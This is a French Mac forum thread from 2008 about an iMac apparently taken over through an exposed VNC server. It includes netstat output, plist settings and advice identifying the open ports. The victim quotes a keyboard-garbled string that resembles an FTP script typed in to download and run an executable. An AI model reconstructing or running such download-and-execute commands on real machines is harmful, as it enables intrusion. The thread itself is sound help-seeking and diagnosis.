Bienvenue invité ( Connexion | Inscription )
8 Jan 2008, 15:55
Message
#1
|
|
|
Adepte de Macbidouille ![]() Groupe : Membres Messages : 154 Inscrit : 7 Apr 2006 Membre no 59 008 |
Bonjour les bidouilleurs.
Oui, je sais, cette question revient régulièrement sur les forums mais ce qui arrive à ma collègue est assez étrange. Alors voilà, Plusieurs fois, alors qu'elle travaillait sous Word, elle eu la surprise de voir apparaitre le texte suivant : C,d =c echo open !é :é »& :&éà :!ç & !§ç§ :: uèecho user q b :: uèecho binqry :: uèecho get h,, :exe :: uèecho auit :: uèftp :exe )n )smuèh,, :exe èexit Je précise tout de suite qu'elle n'a aucune connaissance en informatique et que sa maison n'est pas construite sur un cimetière Indien. Çà ressemble à une commande terminal mais je serais bien incapable de la lire. Autre chose est arrivé hier, la souris a pris le contrôle de l'ordinateur, ouvert et refermé des documents etc. Ce qui est étrange car VNC n'était pas activé à ce moment là. Aujourd'hui, son mac émet des bruits genre 'boinc'. Bref, son Mac est hanté. Matériel : iMac Intel 17", Tiger, plusieurs sessions d'utilisateur... utilisant MSN. Je vais aller y faire un tour histoire de changer les mots de passe, vérifier le firewall, rechercher d'hypothétiques virus, procéder aux mises à jour... Mais vous en pensez quoi ? Quels outils puis-je utiliser pour nettoyer tout ça ? Et comment s'assurer que cela n'arrive plus ? Ce message a été modifié par Ponchan - 8 Jan 2008, 15:56. -------------------- Serial switcher
|
|
|
|
![]() |
16 Jan 2008, 17:34
Message
#2
|
|
|
Adepte de Macbidouille ![]() Groupe : Membres Messages : 154 Inscrit : 7 Apr 2006 Membre no 59 008 |
Une précision, le bundle /Library/StartupItems/OSXvnc/OSXvnc-server
c'est le system server de Vine server (je crois qu'il permet de lancer le serveur dans plusieurs sessions). Il reste actif même en cas de désinstallation du programme si on a pas pensé à le désactiver. [EDIT voilà le travail (attention, c'est long) Le server de la mort /Library/StartupItems/OSXvnc/OSXvnc-server: CGSLookupServerPort: _CGSSessionDeathWatchPort(gSessionPort) returns 268435459 Les ports ouverts Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp4 0 0 Le forward du port de VNC Mon adresse IP.49263 ESTABLISHED tcp4 0 0 *.5901 *.* LISTEN tcp46 0 0 *.5901 *.* LISTEN tcp4 0 0 *.* *.* CLOSED tcp4 0 0 *.* *.* CLOSED tcp4 0 0 *.3831 *.* LISTEN C'est quoi ça ?: tcp4 64065 0 192.168.6.20.49432 212.203.66.98.8000 ESTABLISHED tcp4 0 0 *.3689 *.* LISTEN tcp4 0 0 *.3874 *.* LISTEN tcp4 0 0 127.0.0.1.1033 127.0.0.1.1015 ESTABLISHED tcp4 0 0 127.0.0.1.1015 127.0.0.1.1033 ESTABLISHED tcp4 0 0 127.0.0.1.631 *.* LISTEN tcp4 0 0 127.0.0.1.1033 127.0.0.1.1016 ESTABLISHED tcp4 0 0 127.0.0.1.1016 127.0.0.1.1033 ESTABLISHED tcp4 0 0 127.0.0.1.1033 127.0.0.1.1021 ESTABLISHED tcp4 0 0 127.0.0.1.1021 127.0.0.1.1033 ESTABLISHED tcp4 0 0 127.0.0.1.1033 *.* LISTEN udp4 0 0 *.* *.* udp4 0 0 *.* *.* udp4 0 0 *.2222 *.* udp4 0 0 *.5353 *.* udp4 0 0 *.631 *.* udp4 0 0 192.168.6.20.123 *.* udp6 0 0 fe80:4::217:f2ff.123 *.* udp6 0 0 fe80:1::1.123 *.* udp6 0 0 ::1.123 *.* udp4 0 0 127.0.0.1.123 *.* udp6 0 0 *.123 *.* udp4 0 0 *.123 *.* udp4 0 0 127.0.0.1.49163 127.0.0.1.1022 udp4 0 0 127.0.0.1.49162 127.0.0.1.1022 udp4 0 0 127.0.0.1.1022 *.* udp4 0 0 127.0.0.1.49156 127.0.0.1.1023 udp4 0 0 127.0.0.1.1023 *.* udp6 0 0 *.5353 *.* udp4 0 0 *.5353 *.* udp4 0 0 127.0.0.1.1033 *.* udp4 0 0 *.* *.* icm6 0 0 *.* *.* Active LOCAL (UNIX) domain sockets Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr 368a3b8 stream 0 0 0 368a440 0 0 /var/run/mDNSResponder 368a440 stream 82 0 0 368a3b8 0 0 368a6e8 stream 0 0 0 368a770 0 0 /var/run/mDNSResponder 368a770 stream 0 0 0 368a6e8 0 0 368a7f8 stream 0 0 0 368a880 0 0 /var/run/mDNSResponder 368a880 stream 0 0 0 368a7f8 0 0 368a908 stream 0 0 0 368a990 0 0 /var/run/mDNSResponder 368a990 stream 0 0 0 368a908 0 0 368aa18 stream 0 0 0 368aaa0 0 0 /var/run/mDNSResponder 368aaa0 stream 0 0 0 368aa18 0 0 368ab28 stream 0 0 0 368abb0 0 0 /var/run/mDNSResponder 368abb0 stream 0 0 0 368ab28 0 0 368ad48 stream 0 0 0 368add0 0 0 /var/run/mDNSResponder 368add0 stream 0 0 0 368ad48 0 0 368aee0 stream 0 0 0 368af68 0 0 /Users/catherine/Library/Caches/Acrobat/7.0/Organizer70 368af68 stream 0 0 0 368aee0 0 0 2e8b088 stream 0 0 387fbdc 0 0 0 /Users/catherine/Library/Caches/Acrobat/7.0/Organizer70 2e8b220 stream 0 0 0 2e8b110 0 0 /Users/catherine/Library/Caches/Acrobat/7.0/Organizer70 2e8b110 stream 0 0 0 2e8b220 0 0 2e8b330 stream 0 0 387fc60 0 0 0 /Users/catherine/Library/Caches/Acrobat/7.0/Organizer70 2e8b198 stream 0 0 0 2e8b2a8 0 0 /var/tmp/SCDynamicStoreNotifyFileDescriptor-23811 2e8b2a8 stream 0 0 0 2e8b198 0 0 2e8b4c8 stream 0 0 0 2e8b550 0 0 /var/run/mDNSResponder 2e8b550 stream 0 0 0 2e8b4c8 0 0 2e8b5d8 stream 0 0 0 2e8b660 0 0 /var/run/mDNSResponder 2e8b660 stream 0 0 0 2e8b5d8 0 0 2e8b6e8 stream 0 0 0 2e8b770 0 0 /var/run/mDNSResponder 2e8b770 stream 0 0 0 2e8b6e8 0 0 2e8b7f8 stream 0 0 0 2e8b880 0 0 /var/run/mDNSResponder 2e8b880 stream 0 0 0 2e8b7f8 0 0 2e8baa0 stream 0 0 0 2e8b908 0 0 /var/run/mDNSResponder 2e8b908 stream 0 0 0 2e8baa0 0 0 2e8b990 stream 0 0 0 2e8ba18 0 0 /var/run/usbmuxd 2e8ba18 stream 0 0 0 2e8b990 0 0 2898110 stream 0 0 0 2e8bbb0 0 0 2e8bbb0 stream 0 0 0 2898110 0 0 2e8be58 stream 0 0 0 2e8bc38 0 0 /var/run/usbmuxd 2e8bc38 stream 0 0 0 2e8be58 0 0 2e8bee0 stream 0 0 2ec3dec 0 0 0 /private/var/run/cupsd 2898440 stream 0 0 0 28984c8 0 0 /var/run/mDNSResponder 28984c8 stream 0 0 0 2898440 0 0 28987f8 stream 0 0 2d2bc60 0 0 0 /var/run/pppconfd 2898dd0 stream 0 0 0 2898b28 0 0 /var/run/asl_input 2898b28 stream 0 0 0 2898dd0 0 0 2898bb0 stream 0 0 2c715ac 0 0 0 /var/run/asl_input 2898cc0 stream 0 0 2c719cc 0 0 0 /var/run/mDNSResponder 2898e58 stream 0 0 2c2d7bc 0 0 0 /var/run/usbmuxd 2898ee0 stream 0 0 2c2d840 0 0 0 /var/run/portmap.socket 2898f68 stream 0 0 2897ef4 0 0 0 /var/launchd/0/sock 368a2a8 dgram 0 0 0 368a330 368a330 0 368a330 dgram 0 0 0 368a2a8 368a2a8 0 368a4c8 dgram 0 0 0 368a550 368a550 0 368a550 dgram 0 0 0 368a4c8 368a4c8 0 368a5d8 dgram 0 0 0 368a660 368a660 0 368a660 dgram 0 0 0 368a5d8 368a5d8 0 368ac38 dgram 0 0 0 368acc0 368acc0 0 368acc0 dgram 0 0 0 368ac38 368ac38 0 368ae58 dgram 0 0 0 2e8b000 2e8b000 0 2e8b000 dgram 0 0 0 368ae58 368ae58 0 2e8b3b8 dgram 0 0 0 2e8b440 2e8b440 0 2e8b440 dgram 0 0 0 2e8b3b8 2e8b3b8 0 2e8bb28 dgram 0 0 0 28986e8 28986e8 0 28986e8 dgram 0 0 0 2e8bb28 2e8bb28 0 2e8bdd0 dgram 0 0 0 2898198 2898198 0 2898198 dgram 0 0 0 2e8bdd0 2e8bdd0 0 2e8bcc0 dgram 0 0 0 2e8bd48 2e8bd48 0 2e8bd48 dgram 0 0 0 2e8bcc0 2e8bcc0 0 2898220 dgram 0 0 0 2898a18 0 2898088 2898088 dgram 0 0 0 2898a18 0 2e8bf68 2e8bf68 dgram 0 0 0 2898a18 0 2898000 2898000 dgram 0 0 0 2898a18 0 28982a8 28982a8 dgram 0 0 0 2898a18 0 2898660 2898330 dgram 0 0 0 28983b8 28983b8 0 28983b8 dgram 0 0 0 2898330 2898330 0 2898550 dgram 0 0 0 28985d8 28985d8 0 28985d8 dgram 0 0 0 2898550 2898550 0 2898660 dgram 0 0 0 2898a18 0 2898770 2898770 dgram 0 0 0 2898a18 0 2898908 2898908 dgram 0 0 0 2898a18 0 2898880 2898880 dgram 0 0 0 2898a18 0 2898990 2898990 dgram 0 0 0 2898a18 0 2898aa0 2898aa0 dgram 0 0 0 2898a18 0 0 2898a18 dgram 0 0 2c71210 0 2898220 0 /var/run/syslog 2898c38 dgram 0 0 0 2898d48 2898d48 0 2898d48 dgram 0 0 0 2898c38 2898c38 0 [Skarn:~] catherin% Le contenu du fichier plist dOSXserver serverKeepAlive 1 terminateOnFastUserSwitch 0 disableRichClipboard 0 Converted 1 localhostOnly 0 allowPressModsForKeys 0 allowSleep 0 NSWindow Frame Vine Server 990 232 432 407 0 0 1440 878 desktopName catherine (Skarn.local) sharingMode 0 NSWindow Frame Server Panel 990 232 432 407 0 0 1440 878 portNumber 0 startServerOnLaunch 1 disableRemoteEvents 0 dontDisconnectClients 1 allowDimming 1 showMouse 0 allowScreenSaver 1 allowRendezvous 1 swapButtons 1 allowKeyboardLoading 0 ] Je suis preneur pour l'explication de texte parceque j'y benne pas grand chose. Merci les gars ! Ce message a été modifié par Ponchan - 16 Jan 2008, 17:47. -------------------- Serial switcher
|
|
|
|
16 Jan 2008, 18:11
Message
#3
|
|
![]() Macbidouilleur d'Or ! ![]() ![]() ![]() ![]() ![]() Groupe : Membres Messages : 1 745 Inscrit : 13 Nov 2006 Membre no 72 823 |
CITATION(Ponchan @ 16 Jan 2008, 17:34) [snapback]2519909[/snapback] C'est quoi ça ?: tcp4 64065 0 192.168.6.20.49432 212.203.66.98.8000 ESTABLISHED Un serveur shoutcast : http://212.203.66.98:8000/ Ta collègue écoute une radio en ligne, c'est pas grave Le port 5901 en dessous, c'est un serveur VNC Le 3831, connais pas. 3689 : partage iTunes 3874: Connais pas non plus. Mais pas la peine de trop chercher, si le seul port que tu forwarde à travers le routeur est celui que tu utilises pour VineServer, c'est le seul accesible de l'extérieur donc les attaques ne peuvent arriver que par la , a moins d'un malware qui initierait des connexions vers l'extérieur, mais il n'en existe pas (encore de connus) sur OS X. Ce message a été modifié par darenzana - 16 Jan 2008, 18:11. -------------------- Macbook Pro 15" Core 2 Duo 2.33GHz, 3Go RAM, Mac OS X 10.6.8 | Macbook Air 13" mi-2011 Core i5, Mac OS X 10.8
NAS Synology DS-110+ iPhone 6 silver 64Go - forfait SFR Red 3Go |
|
|
|
16 Jan 2008, 18:17
Message
#4
|
|
|
Macbidouilleur d'Or ! ![]() ![]() ![]() ![]() ![]() Groupe : Membres Messages : 6 584 Inscrit : 20 Mar 2003 Membre no 6 765 |
CITATION(darenzana @ 16 Jan 2008, 18:11) [snapback]2519974[/snapback] Le port 5901 en dessous, c'est un serveur VNC Tu ne trouves pas bizarre qu'il y ait deux serveurs VNC ? -------------------- késtananafout' (:
|
|
|
|
16 Jan 2008, 18:23
Message
#5
|
|
![]() Macbidouilleur d'Or ! ![]() ![]() ![]() ![]() ![]() Groupe : Membres Messages : 1 745 Inscrit : 13 Nov 2006 Membre no 72 823 |
CITATION(chombier @ 16 Jan 2008, 18:17) [snapback]2519986[/snapback] CITATION(darenzana @ 16 Jan 2008, 18:11) [snapback]2519974[/snapback] Le port 5901 en dessous, c'est un serveur VNC Tu ne trouves pas bizarre qu'il y ait deux serveurs VNC ? Je n'en vois qu'un, qui écoute sur le port 5901 en IPv4 et en IPv6. Non? -------------------- Macbook Pro 15" Core 2 Duo 2.33GHz, 3Go RAM, Mac OS X 10.6.8 | Macbook Air 13" mi-2011 Core i5, Mac OS X 10.8
NAS Synology DS-110+ iPhone 6 silver 64Go - forfait SFR Red 3Go |
|
|
|
Ponchan Un iMac Hacké ? 8 Jan 2008, 15:55
Mohirei Bonjour ,
une petite recherche (avec les mots-c... 8 Jan 2008, 15:59
Ponchan Merci Mohirei !
Effectivement, cette recherch... 8 Jan 2008, 16:23
darenzana => http://forum.macbidouille.com/index.php?s=..... 8 Jan 2008, 20:36
Ponchan Merci Darenzana,
C'est exactement le forum que... 9 Jan 2008, 10:35
Ponchan Je fais un petit up suite à mon intervention sur ... 16 Jan 2008, 13:18
Fabricius Sauvegarde les données de la machine et fait un b... 16 Jan 2008, 13:21
Ponchan Mouaip. J'ai laissé les CD d'install au b... 16 Jan 2008, 13:26
Fabricius CITATION(Ponchan @ 16 Jan 2008, 13:26) 25... 16 Jan 2008, 13:31
uzboxberg Probablement rien à voir, mais il y a eu ici-mêm... 16 Jan 2008, 14:25
Ponchan En dégageant ce petit fichier /Library/StartupIte... 16 Jan 2008, 14:35
chombier CITATION(Ponchan @ 16 Jan 2008, 14:35) 25... 16 Jan 2008, 15:05
trouspinette CITATION(Ponchan @ 16 Jan 2008, 14:35) 25... 22 Jan 2008, 22:29
chombier CITATION(trouspinette @ 22 Jan 2008, 22:2... 22 Jan 2008, 22:40
Morjice CITATION(trouspinette @ 22 Jan 2008, 22:2... 23 Jan 2008, 10:28
Ponchan Chombier,
J'utilise la dernière version de Vi... 16 Jan 2008, 16:09
darenzana CITATION(Ponchan @ 16 Jan 2008, 16:09) 25... 16 Jan 2008, 16:15
chombier CITATION(Ponchan @ 16 Jan 2008, 16:09) 25... 16 Jan 2008, 16:18
Ponchan CITATION(chombier @ 16 Jan 2008, 16:18) 2... 16 Jan 2008, 16:39
chombier CITATION(Ponchan @ 16 Jan 2008, 16:39) 25... 16 Jan 2008, 16:59
Ponchan Merci pour ces précisions Chombier.
J'ai dés... 16 Jan 2008, 17:05
chombier CITATION(Ponchan @ 16 Jan 2008, 17:05) 25... 16 Jan 2008, 17:16
chombier CITATION(Ponchan @ 16 Jan 2008, 17:34) 25... 16 Jan 2008, 18:04

chombier CITATION(darenzana @ 16 Jan 2008, 18:23) ... 16 Jan 2008, 18:30

darenzana CITATION(chombier @ 16 Jan 2008, 18:30) 2... 16 Jan 2008, 18:34


chombier CITATION(darenzana @ 16 Jan 2008, 18:34) ... 16 Jan 2008, 18:39

Ponchan CITATION(chombier @ 16 Jan 2008, 18:30) 2... 17 Jan 2008, 09:54

Fabricius CITATION(Ponchan @ 17 Jan 2008, 09:54) 25... 17 Jan 2008, 09:56

chombier CITATION(Ponchan @ 17 Jan 2008, 09:54) 25... 17 Jan 2008, 12:19
Fabricius CITATION(darenzana @ 16 Jan 2008, 18:11) ... 16 Jan 2008, 18:51
darenzana CITATION(Fabricius @ 16 Jan 2008, 18:51) ... 16 Jan 2008, 18:55
Fabricius CITATION(darenzana @ 16 Jan 2008, 18:55) ... 16 Jan 2008, 19:01
darenzana Quelle version, le Vine server installé?
Plutot ... 16 Jan 2008, 17:47
Ponchan CITATION(darenzana @ 16 Jan 2008, 17:47) ... 16 Jan 2008, 17:50
darenzana Au fait, tu as redémarré après avoir suprimé /... 16 Jan 2008, 18:46
chombier CITATION(darenzana @ 16 Jan 2008, 18:46) ... 16 Jan 2008, 18:59
chombier Certes. Mais deux serveurs VNC accessibles de l... 16 Jan 2008, 18:53
Fabricius CITATION(chombier @ 16 Jan 2008, 18:53) 2... 16 Jan 2008, 18:56
darenzana CITATION(chombier @ 16 Jan 2008, 18:53) 2... 16 Jan 2008, 18:57
Ponchan ouh la, vous n'avez pas chômé les gars ... 17 Jan 2008, 00:05
darenzana CITATION(Ponchan @ 17 Jan 2008, 00:05) 25... 17 Jan 2008, 00:10
Ponchan Physiquement, pourquoi pas.
Vous croyez qu'on ... 17 Jan 2008, 09:59
Fabricius CITATION(Ponchan @ 17 Jan 2008, 09:59) 25... 17 Jan 2008, 10:02
Ponchan Ca recommence !
Petit bilan de ce que j'a... 18 Jan 2008, 09:33
Fabricius CITATION(Ponchan @ 18 Jan 2008, 09:33) 25... 18 Jan 2008, 11:55

darenzana CITATION(Fabricius @ 18 Jan 2008, 11:55) ... 18 Jan 2008, 13:50

chombier CITATION(darenzana @ 18 Jan 2008, 13:50) ... 18 Jan 2008, 13:52

darenzana CITATION(chombier @ 18 Jan 2008, 13:52) 2... 18 Jan 2008, 13:57

chombier CITATION(darenzana @ 18 Jan 2008, 13:57) ... 18 Jan 2008, 14:01

Ponchan CITATION(chombier @ 18 Jan 2008, 14:01) 2... 18 Jan 2008, 14:38

darenzana CITATION(Ponchan @ 18 Jan 2008, 14:38) 25... 18 Jan 2008, 14:48


Ponchan CITATION(darenzana @ 18 Jan 2008, 14:48) ... 18 Jan 2008, 15:13

chombier CITATION(Ponchan @ 18 Jan 2008, 14:38) 25... 18 Jan 2008, 15:33
chombier CITATION(Ponchan @ 18 Jan 2008, 09:33) 25... 18 Jan 2008, 12:09
Ponchan Merci Chombier.
Alors,
J'utilise Vine server p... 18 Jan 2008, 14:05
Fabricius CITATION(Ponchan @ 18 Jan 2008, 14:05) 25... 18 Jan 2008, 14:37
Ponchan Ok Chombier,
Alors voici ce que je vais faire.
Je ... 18 Jan 2008, 16:03
Fabricius CITATION(Ponchan @ 18 Jan 2008, 16:03) 25... 19 Jan 2008, 14:58
macuserfr Une chose que personne n'a évoqué: ARD est c... 19 Jan 2008, 15:18
Macuserman Bonne chance pour ton chantier en perspective...ma... 19 Jan 2008, 15:24
darenzana CITATION(Macuserman @ 19 Jan 2008, 15:24)... 19 Jan 2008, 15:46
Ponchan Bon, je tâcherai d'employer le bon vocabulair... 19 Jan 2008, 16:17
Fabricius CITATION(Ponchan @ 19 Jan 2008, 16:17) 25... 20 Jan 2008, 11:37
trouspinette CITATION(Fabricius @ 20 Jan 2008, 11:37) ... 22 Jan 2008, 22:53
Macuserman Ah, j'adore ton jeux de mot....cracker belin ... 19 Jan 2008, 17:08
macuserfr Ponchan, jette un coup d'oeil quand même sur ... 20 Jan 2008, 01:37
macuserfr Perso chez moi j'ai monté un petit serveur po... 20 Jan 2008, 12:27
Ponchan C'est sur qu'un petit firewall matériel e... 20 Jan 2008, 15:42
macuserfr Bah voilà Ça me rappelle une expérience vécue... 20 Jan 2008, 16:01
Ponchan Si je me faisait payer à l'heure le temps que... 20 Jan 2008, 20:44
Macuserman Bon, t'as encore des problèmes ou tu as exéc... 21 Jan 2008, 18:26
Ponchan Je ne m'y suis pas encore attaqué. Peut-être... 22 Jan 2008, 09:26
Fabricius CITATION(Ponchan @ 22 Jan 2008, 09:26) 25... 22 Jan 2008, 12:58
Ponchan ouais... ok... bon... pff...
la bonne phrase devai... 22 Jan 2008, 14:16
bilbox Bonjour à tous,
Ponchan tu tiens ton public... t... 22 Jan 2008, 14:58
macuserfr Faut dire, un mac hacké ça mérite de faire la u... 22 Jan 2008, 21:23
ricorich Clair que un mac qui est hacké, c'est pas cou... 22 Jan 2008, 22:23
Ponchan Encore un peu de patience... Ma collègue habite d... 23 Jan 2008, 10:10
Fabricius CITATION(Ponchan @ 23 Jan 2008, 10:10) 25... 23 Jan 2008, 21:25
Ponchan Merci Morjice,
Je tiens donc le bon bout à priori... 23 Jan 2008, 11:10
macuserfr Si tout marche et qu'il n'a pas reattaqué... 23 Jan 2008, 18:42
Morjice CITATION(macuserfr @ 23 Jan 2008, 18:42) ... 23 Jan 2008, 19:24
Ponchan Je plaisantais bien sûr...
Ce qui nous intéresse... 24 Jan 2008, 09:47![]() ![]() |
| Nous sommes le : 5th April 2026 - 19:58 |